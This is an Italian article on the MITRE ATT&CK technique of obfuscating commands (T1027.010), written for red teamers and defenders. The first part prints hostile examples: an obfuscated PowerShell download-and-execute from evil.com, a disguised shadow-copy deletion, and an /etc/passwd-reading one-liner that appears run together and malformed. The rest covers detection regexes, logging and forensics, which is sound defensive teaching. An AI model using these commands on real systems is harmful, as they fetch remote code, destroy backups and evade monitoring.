Offuscamento di Comandi: Obfuscated Commands (T1027.010)

L'arte dell'offuscamento inizia con tecniche basilari che ogni red teamer dovrebbe padroneggiare. Su Windows, il comando più semplice può essere trasformato in modo irriconoscibile:

powershell -enc RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==

Questo esegue un innocuo "Get-Process" attraverso encoding Base64. Ma possiamo spingerci oltre con Invoke-Obfuscation, il framework utilizzato da APT32 e MuddyWater. Dopo aver importato il modulo, la magia avviene con:

Invoke-Obfuscation -ScriptBlock {IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')} -Command 'Token\All\1,Encoding\1'

Su Linux, la creatività non ha limiti. I threat actor sfruttano il command substitution e il piping creativo:

echo 'd2hvYW1p' | base64 -d | bash rev <<<'tac /etc/passwd' | sh

La directory traversal aggiunge un ulteriore layer di confusione. Turla ha dimostrato l'efficacia di questa tecnica con path contorti:

C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete

Per automatizzare l'offuscamento su larga scala, Invoke-DOSfuscation permette di trasformare batch script in puzzle sintattici. Il comando diventa un labirinto di variabili d'ambiente e caratteri di escape che mantiene la stessa funzionalità originale mentre evade le signature tradizionali.

Il rilevamento dell'offuscamento richiede un approccio multidimensionale che va oltre le signature statiche. L'entropia delle command line diventa il primo indicatore: stringhe con alta densità di caratteri Base64 o simboli di escape devono triggerare alert immediati.

Su Windows, monitorate EventCode 4688 con particolare attenzione ai processi PowerShell che contengono il parametro -enc o -EncodedCommand. La regex pattern deve catturare variazioni come:

powershell.exe.(-enc|-encodedcommand|-e\s).[A-Za-z0-9+/=]{50,}

L'Attack Surface Reduction (ASR) di Windows 10+ offre protezione nativa contro script offuscati. Configurate la regola "Block execution of potentially obfuscated scripts" attraverso Group Policy o Intune per prevenzione proattiva.

Per Linux, auditd deve tracciare le SYSCALL con particolare focus su execve contenenti pipe multipli o caratteri di escape anomali. La detection strategy AN1395 suggerisce di monitorare:

• Token count superiore a 20 in singole command line
• Presenza di eval, base64, od -c in combinazione
• Pattern di globbing anomali come /tmp/:&$

L'Antimalware Scan Interface (AMSI) su Windows rappresenta l'ultima linea di difesa. Intercetta i comandi dopo la de-offuscazione, permettendo l'analisi del contenuto reale. Integrate AMSI nei vostri EDR per visibilità completa sulla catena di esecuzione.

La ricostruzione forense di attacchi offuscati richiede pazienza e metodologia. Gli artefatti principali risiedono nei log di PowerShell, specificamente in Microsoft-Windows-PowerShell/Operational EventID 4104 che cattura i blocchi di script dopo la de-offuscazione.

Su sistemi Windows, il Registry mantiene tracce persistenti. ComRAT ha dimostrato come l'offuscamento venga utilizzato per nascondere codice orchestrator direttamente nelle chiavi di registro. Analizzate:

HKLM\SOFTWARE\Classes\CLSID\ per valori con alta entropia HKCU\Environment per variabili sospette utilizzate nella ricostruzione di comandi

La timeline reconstruction beneficia dell'analisi comparata tra process creation (4688) e script block logging (4104). La discrepanza temporale tra esecuzione offuscata e logging del contenuto cleartext rivela il metodo di encoding utilizzato.

Per Linux, i file di history vengono spesso sanitizzati dagli attaccanti, ma auditd mantiene traccia immutabile. Cercate pattern di:

• Comandi con backslash multipli indicanti escape sequences
• Utilizzo anomalo di printf o echo con hex encoding
• Chiamate a interpreti secondari (python -c, perl -e)

macOS presenta sfide uniche con osascript e AppleScript. Il Unified Log contiene evidenze di esecuzione offuscata attraverso do shell script con encoding inline. La persistenza tramite Launch Agents spesso include plist offuscati che richiedono decodifica manuale.

Turla rimane il gold standard nell'offuscamento sofisticato. Il gruppo russo combina salted 3DES encryption con random variable naming, creando layer multipli di protezione. La loro toolchain include Out-EncryptedScript.ps1 di PowerSploit, indicatore chiave per attribution.

FIN7 dimostra creatività nell'uso di variabili d'ambiente e stdin per frammentare i comandi. Il loro approccio modulare permette di bypassare detection basate su pattern matching, richiedendo analisi comportamentale per l'identificazione. I financial threat actor come FIN7 e FIN8 condividono TTP nell'offuscamento di macro malevole.

I gruppi iraniani APT33 e Magic Hound preferiscono Base64 semplice ma applicato sistematicamente. Questa apparente semplicità nasconde volume: campagne massive che saturano i SOC con falsi positivi. Leafminer, altro attore iraniano, aggiunge layer di offuscamento proprietario ai loro script.

L'overlap geografico rivela pattern interessanti. Attori cinesi come APT19 e Chimera utilizzano Base64 standard ma con catene di comando più lunghe. Kimsuky nordcoreano mantiene semplicità tattica con encoding minimale ma efficace.

La tendenza evolutiva mostra migrazione verso:

• Offuscamento context-aware che si adatta all'ambiente target
• Utilizzo di legitimate tools (Living off the Land) con parametri offuscati
• Encoding multiplo con algoritmi proprietari
• Integrazione di machine learning per generare offuscamento dinamico

Framework MITRE ATT&CK T1027.010 documenta tecniche di offuscamento utilizzate da 28 gruppi APT in campagne globali dal 2017. Detection strategies AN1394-1396 forniscono approcci platform-specific. Risorse chiave: Invoke-Obfuscation framework, AMSI documentation Microsoft, auditd man pages per Linux detection.